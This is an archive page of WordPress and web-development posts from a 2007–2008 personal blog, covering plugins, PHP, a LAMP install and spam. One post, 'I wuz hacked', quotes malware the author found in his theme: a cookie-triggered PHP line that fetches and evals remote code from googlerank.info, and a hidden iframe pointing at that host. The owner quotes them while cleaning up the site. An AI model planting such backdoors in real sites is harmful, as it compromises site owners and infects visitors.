Archive for the ‘WordPress’ Category

TapParsing XML with PHP

17 Nov 2008 19:55 by Rick

Following on from the last.fm saga described earlier, I went on to look at the method user.GetWeeklyAlbumChart which requires accessing user.GetWeeklyChartList first.

I am using the plugin iLast.Fm from Leandro Alonso and the code he is using looks right but doesn’t seem to work. He uses curl to get the XML from the last.fm site. The XML you get is of the form

<lfm status="ok">
<weeklychartlist user="[username]">
<chart from="1225022400" to="1225627200"/>
<chart from="1225627200" to="1226232000"/>
<chart from="1226232000" to="1226836800"/>
</weeklychartlist>
</lfm>

He then parses it with simplexml_load_file() and puts it into an object called $chart. Then the code processes this as follows

$chartopt = sizeof($chart->weeklychartlist->chart) - 1;
$chart = $chart->weeklychartlist->chart[$chartopt];

and uses $chart['from'] and $chart['to'] in the call to user.GetWeeklyAlbumChart.

The problem is that $chartopt always has the value 0 which means that the sizeof() function is not working properly. There is a comment on the PHP documenattion page which says that foreach doesn’t work but reccomends count/sizeof() instead. What can be wrong?

Update: The answer seems to be here: SimpleXML is not so simple and it doesn’t behave correctly. It needs

$chartopt = -1;
foreach($chart->weeklychartlist->chart as $i) $chartopt++;

TapWordPress Event Plugins

23 Oct 2008 13:45 by Rick

Looking for plugins for WordPress (or probably any other package) is very frustrating. First you have to search the directory (which, I agree, is a big improvement on what it used to be) and sift out the possible from the unlikely. Then look at the descriptions, which are often completely inadequate, and test the promising candidates.

Upcoming ServicesI have been looking for an Event system for the church web site—one that allows you to post-date items and list upcoming events, particularly services. There are a number based around iCal and Google Calendar but I didn’t want to get into that level of complexity and, anyway, a calendar based presentation is not as direct and immediate we wanted. Eventually I narrowed it down to two: WP Events and RS Event. Another one which looks promising (but complex) is Events Category but I haven’t had time to look at it [Update below].

WP-Events

Pro—Actively maintained and developed by the author (Arnan de Gans).
Supports start and end dates and times, multi- and all-day events.
Provides sidebar widget and main page hooks for upcoming events and archives plus function calls for experts.
Allows different categories for events.
Incorporates Event Location. This is not something that we would use, preferring to put this sort of information into the description.
The dedicated admin page (Manage Events) has full information about each item.
Allows HTML tags in sidebar for images and markup.
Very flexible configuration.
Simple implementation so easy to hack.

Con—Uses a separate database table for events so they are not found by the search engine.
Excerpting is done by character count rather than word which can break HTML.
Non-standard interface for creating events which is not foolproof for the non-geek e.g. no implicit tags and validation.
Events cannot be in more than one category and they bear no relation to WP post categories.
There is no single event display without creating a separate WP post and linking to it.
The More link appears even if there is no more.

RS-Event

Pro—Uses extra metadata on standard posts to indicate start date/time. Hence search and ordinary posts listings work.
Provides sidebar widget and function call for experts.
Allows different (standard WP post) categories for events.
Events can be put into multiple categories
Very easy to use, suitable for admin staff.
Simple implementation so easy to hack.

Con—the author (Robert Sargant) has vanished so it is no longer supported, though a working version patched for current WordPress can be found at LivingOS. A hacked version exists with some extra features by Nudnik.
Uses standard (rather inflexible) WP excerpting which doesn’t allow markup.
You can’t tell from the admin pages (Manage Posts) the date of each event.
There is no recording of end date/times so no concept of an event duration or multi- and all-day events.
Non-widget configuration has to be done by editing the theme files making the theme site specific (because it refers to categories explicitly by ID).
Requires an unpublished hack to get event date/time to appear in archives, search listings and single post pages.
The More link appears even if there is no more.

I have included both in my demonstrator so the user can choose. I think they will go for the second as it is easier for them to use—the extra work has already been put in my me.

[Update 24 Oct 2008]

Events Category

Something that has saved a great deal of effort is that the author of Events Category (Weston Ruter) has provided an excellent write-up. Reading this I can at least superficially evaluate it without having to download and test it.

Pro—The aforementioned write-up and I think it is maintained though there is a suggestion that it does not work with WordPress 2.5+.
Uses extra metadata on standard posts. Hence search and ordinary posts listings work. In addition, the output method uses the WordPress loop with additional template tags so customising it is flexible and straight forward.
Supports start and end dates and times and hence Multi-day events.
Events can be put into multiple categories
Allows multiple sidebar widgets and plenty of scope for theme writers.
The start date of an event is easy to see from the Manage Posts admin panel (because it is the post date).
Easy to use, suitable for admin staff.
Incorporates a comprehensive Event Location and integrates with various calendar systems.

Con—The start date of an event uses a forward dated post which loses some information, though the update tracking in current WordPress provides this information for audit.
Looking at the (well described) method of operation it is probably fairly complex, modifying deep parts of WordPress, and hence hard to hack. I am not sure I could get it to work with current WP.

From that analysis I don’t think we will be using it but there are some great ideas there that I may adapt for use with whichever system we do go with. One thing the exercise has demonstrated is how many different ways you can use to achieve the same objective.

TapCode Comments

28 Sep 2008 18:01 by Rick

Putting comments in code is a well established, if not rigidly employed method of documenting what the thing does. At best it tells future maintainers how it works and at worst it reminds you when you come back to it later. It doesn’t do anything else. With WordPress it does!

I wanted to make one page in a blog type application look different. The WordPress documentation says that first it looks for a template called pagename.php

Any custom Page Template selected for the page – If the page slug were about, WordPress would look for about.php

failing that then one called page.php and finally index.php working down the hierarchy until it finds one that exists. Now you would think that “pagename” was the name of the page—wrong!

After rootling through the forums I discovered that you have to select a custom “Page Template” on the write/manage page admin panel, THEN it directs it to use the right one.

Looking at the panel—no sign of a “Page Template” menu as promised. Further deep hunting on the forum and even resorting to Google I discover that you have to declare your custom templates—by adding a comment to the beginning in the form

<?php
/*
Template Name: templatename
*/
?>

Now the menu appears and you can chose between “Default Template” or the one you have declared “templatename” That is what I meant. These are not comments, even if they look like comments because the theme integration code is reading and interpreting them. They are effectively executed. I wonder if that is true for any others?

TapColour Management

24 Jun 2008 20:37 by Rick

To those who look carefully, photographs on web pages look dull compared to how they look in photo editors. I always thought it was due to the low resolution but apparently it is all about Colour Management Profiles. These are instructions placed in the image file which tell the receiver how to render the colours and are intended to allow matching on different devices—e.g. Screens on different computers, projectors and printers. However, Firefox has always ignored them; until Firefox 3. IE ignores them as well; Safari does read them but in a different way.

In Firefox, if you go to the about:config page and set gfx.color_management.enabled to True then, after a restart, it will be activated. All the photographs will look just a little bit richer, brighter and more sparkling. The photo purists are wondering why it has not been enabled by default?

Well if you have tried it in Windows you will see—everything else will have taken on a different tinge compared to what it was before, mine went pinkish, others have reported a cream bias. The greys are no longer neutral because in the process of doing it to photographs that come with built-in profiles, they have applied a default profile to everything else on the page and it all looks wrong. The official Mozilla page says that it relies on a properly calibrated monitor. Well mine is as close as I can get it without special hardware but that is not the answer. What you also need to do is set the default profile gfx.color_management.display_profile. You would expect this to be the actual values for your monitor, but that is what Firefox is already doing. What you need to do is set it to C:\WINDOWS\system32\spool\drivers\color\sRGB Color Space Profile.icm to stop Firefox altering it and allow the Windows display driver to make the correction for the screen. Brad Carlile has a good test page—if the greys still look grey and his three test pictures all look the same then you have got it right. The Apple Mac doesn’t seem to have a problem, just set the enabled flag to True and it mostly works. Safari (at least on the Mac) does it like this by default.

Secondly, plugins, particularly Flash, do not compensate, so sites that blend from backgrounds to Flash will no longer be seamless—but my fix seems to solve that as well, unless they are trying to blend Flash with JPG which would be unusual. I haven’t got this working for the Mac yet. and, although Flash blending is ok, apparently Safari falls down for a similar reason; the CSS and GIF backgrounds don’t blend seamlessly with JPG and PNG images. This may also affect my fix but I haven’t had a chance to experiment with it yet. What I need is another comprehensive test page. Update: It is a heavy read, but this page by G. Ballard explains it all and has a lot of test pictures or this excelent article by Jeffrey Friedl.

Finally, it also takes 10–15% more processor power to render the pictures so those on older systems will see a noticeable slow down on picture heavy sites.

I first though that I would be switching it off again until they get this sorted out properly, but having found the profile hack I will leave it, I don’t care about Flash anyway.

TapUser profiles in WordPress

20 May 2008 11:30 by Rick

For some time I have been having problems with registered users. Not the dozen or so users that I know about who either contribute to the site or are left over from the days when I insisted on registration before commenting. No, these are ones where “people” have found the registration page, created a profile but I have never heard from them since. I have been looking for a way to clear them out, which is not easy because I have no way to tell if they have actually commented using that profile and if I delete those, then the comments disappear with them. I have been looking around for a plugin to help and in the mean time I have been deleting ones with email addresses in Russia, Bulgaria and Poland—it is not xenophobia, just that I know that there is a 99% chance that they are spammers.

One possible plugin that I have tried is loginlogger. This keeps a track of when people have logged in. I was hoping it did a bit more but even that has been fascinating. Apart from my own connection, which I know about, I had well over 100 failed logins over a 2 hour period last night, and the usernames were quite repetitive; brutal2008, Reiki, kazikr, broker1980, watroba50, smiglidigli, bombastik2008, etc. occur quite often. These names don’t appear in my roster (but they may have once and I have deleted them, I don’t keep track) but doing a Google search on them reveals a common pattern; most hits are either on SEO sites or are Polish or Russian sites or in those languages.

So my policy seems to be justified—that is where the spammers are. To avoid the problem in the future I could have disabled registration altogether. It isn’t used a lot, but I like to give regular commenters the option of having their profile stored if they want to. So what I have done is install the Sabre plugin. This is a very flexible registration control system with options for Capcha, arithmetic tests, email confirmation and other validation tecniques. I am hoping that with minimal effort I can foil the majority of automatic bot registrations.

TapInstalling LAMP on Ubuntu 7.10 Desktop

2 May 2008 14:22 by Rick

Doing a search with those keywords reveals a number of guides but most are now either old, incomplete or refer to the Ubuntu Server Build which has most of it pre-installed. My requirement was to put Linux (Ubuntu), Apache (web server), MySQL (database) and PHP (programming language) onto an existing desktop build (under VMware Fusion on a Mac) to serve as a WordPress development test-bed to save me having to keep uploading to a sandpit region on my web host.

The references used to achieve (and write) this were LAMP Installation On Ubuntu, Installing LAMP on Ubuntu 7.10 and Installing and configuring LAMP on Ubuntu.

The process will will mostly be done in a terminal (shell) window and a browser. The latter can be on a separate system on your network, in which case subtitute the Ubuntu IP address for “localhost” in the instructions below.

sudo apt-get install apache2
Change the ownership of the web area using
sudo chown -R [your Ubuntu account] /var/www
and test it by pointing a browser at http://localhost/

sudo apt-get install php5 libapache2-mod-php5
Restart Apache (sudo /etc/init.d/apache2 restart), create a file /var/www/phpinfo.php containing the line <?php phpinfo(); ?> and test from the browser (http://localhost/phpinfo.php).

sudo apt-get install mysql-server mysql-client
sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin
During this process you should be asked to set the MySQL root password. It is very important.

Edit /etc/php5/apache2/php.ini and insert the line extension=mysql.so (watch the spelling, the comment in the file is wrong) so that PHP can see MySQL. Also Apache needs to be told where myphpadmin is so edit /etc/apache2/apache2.conf and add the line
Include /etc/phpmyadmin/apache.conf
Restart apache again and test by going to phpmyadmin (http://localhost/phpmyadmin/). The login is root and the MySQL root password (I think).

My immediate requirement was to use it for WordPress. Although you can download a WordPress package using apt-get, I found that this was rather out of date so I did it manually. You will need a database so login to phpmyadmin, create a database by entering the name (e.g. WordPressDB) in the box and click the create button. Now click the SQL button and execute the following command where WordPressDB, WPDBaccount and WPDBaccountPW are your choices.
GRANT ALL ON WordPressDB.* to WPDBaccount@localhost IDENTIFIED BY ‘WPDBaccountPW’;

Now in the WordPress directory (say /var/www/wordpress) copy the wp-config-sample.php file to wp-config.php and edit it thus

// ** MySQL settings ** //
define('DB_NAME', 'WordPressDB');
define('DB_USER', 'WPDBaccount');
define('DB_PASSWORD', 'WPDBaccountPW');

Now finish the install by surfing to http://localhost/wordpress/wp-admin/install.php
It will give you a WordPress admin password on the way.

That is it—the only problems I found were keeping track of which password was which and went where.

By the way, it is only for use on your home network, there are other things you will need to do if you are planning to set it up as a real internet visible server.

TapWordPress update 2.3.3

6 Feb 2008 23:20 by Rick

This came out yesterday as an emergency patch for a vulnerability. I wouldn’t normally write about it here but, for some reason, they didn’t publish the list of changed files. So here they are:—

xmlrpc.php
wp-content\plugins\akismet.php
wp-admin\install-helper.php
wp-includes\version.php
wp-includes\gettext.php
wp-includes\pluggable.php

It is the first one that is important.

TapI wuz hacked

16 Nov 2007 11:06 by Rick

Some time recently (at least I hope it was recently) someone has hacked this blog. It was very subtle and I only discovered when a friend said that she could no longer get to even my home page. She uses McAfee security system and got the message

googlerank.info/counter may cause a breach of browser security.

*Why were you redirected to this page?* When we tested, this site attempted to make unauthorized changes to our test PC by exploiting a browser security vulnerability. This is a serious security threat which could lead to an infection of your PC.

The McAfee information page had more details. I had a hunt around and couldn’t see any mention of this googlerank.info site and no iframes and was beginning to think it was a false alarm. But looking at the page source of the front blog page via the view menu in Firefox, I spotted a small line of code apparently advertising a DVD download site. I can’t show it to you now because I forgot to save a copy but it was rather odd. It was designed not to display (using CSS) so must have been there only for the search engine linking credit; also, it made no mention of the googlerank.info site. It was just before the footer code and didn’t appear on any other blog pages so I was drawn to my theme index.php page and, sure enough, between <?php get_sidebar(); ?> and <?php get_footer(); ?> was the offending line of code. Checking over the rest of the file I found another piece immediately after the initial <?php which did mention the offending googlerank.info stuff which was as follows:—

if (isset($_COOKIE['pird']) or isset($_GET['pird'])) {
if (!isset($_COOKIE['pird'])) setcookie('pird', '12313.412',time()+60*60*24*600);
eval(gzuncompress(file_get_contents('http://googlerank.info/soft/faq.compressed')));
exit;
}

I am not exactly sure what it does, the file referenced seems to be missing, but I have chopped the code out now. A Google search doesn’t come with any hits for this type of hack.

What is worrying is that I don’t know how they got in. I had a good admin password which I have now changed for an even better one. I should also refresh the theme code from source in case there are other changes that I haven’t seen. I will need to look seriously at updating to the latest WordPress version, or perhaps the problem is file permissions? Or is my hosting service compromised? Also, do I need to tell some database somewhere that I am safe again, McAfee seems to have already white-listed me? I can see that there is no point in these security companies telling deliberately malicious sites that they are blacklisted but it would be useful for those of us who have been unknowingly hacked.

As a result I have a lot more respect for McAfee than I did before, I see they also know that the site is hosted in Canada.

Update: Looking around I found that the main site index.htm was also modified. It had the well known line

<iframe src=http://googlerank.info/counter style=display:none></iframe>

so this is probably what McAfee was seeing. What I still don’t know is how it was done. None of the file or directory protections are bad and the date on the files attacked is the same as the original. I have now refreshed everything so it should be clean but if you don’t know how then it remains a concern.

Update 2: Mtekk’s Crib seems to have found a similar problem.

Update 3: Creative Briefing has experienced a similar problem using WordPress version 2.3.3 (the current one at 13-Mar-2008). This is very worrying.

TapWordPress Security

7 Nov 2007 12:56 by Rick

BlogSecurity has published a white paper about how to secure your WordPress installation. A lot of the stuff in there is security by obscurity e.g. changing your database prefix and renaming your admin account which may slow down intruders but there is some good stuff in there as well. They also advertise a WordPress Security Scanner which should be worth a test.

Thanks to LiquidMatrix for the nudge.

TapAkismet Spam Statistics

6 Jul 2007 09:05 by Rick

As my “caught spam” counter rapidly approaches the 100,000 milestone I have noticed that there seems to be a discrepancy. Currently I get between 200 and 300 spam comments a day on this blog. This high figure really kicked in over Christmas last year but I have been using the Akismet anti-spam plugin since the previous May when the problem was significant, but a lot less.

The way Akisment works is that, as each comment arrives, details of it are checked against a central database at Automattic and an opinion is given as to whether it is spam or not. If it thinks it is spam it is put in a separate bucket and doesn’t get displayed; if not it goes for moderation as normal (I am a bit more paranoid than some and every time I consider taking off the moderation, I get a flurry of misses). The spam comments are kept for 15 days unless deleted manually and I have an opportunity to override the decision, though I haven’t seen a single false positive yet.

So every comment that arrives is given a unique number in the blog database, there doesn’t seem to be any way of bypassing that as they are all kept for a period and need to be referenced. As I write the latest spam message has been given number 62,407. This is 150 a day since I started, which seems reasonable. So how do Akismet reckon that they have stopped 99,315 on my behalf, almost 100 a day more?

The faq says

Some versions of the Akismet for WordPress plugin will hide duplicate comments, making it appear to be a different number caught than displayed.

but I can see no evidence of that and I am using the standard issued plugin.

It is not particularly important as there is no doubt that it does a good job, but it would suggest that their web site claim of nearly 2 billion spam blocked is also inflated.

^ Top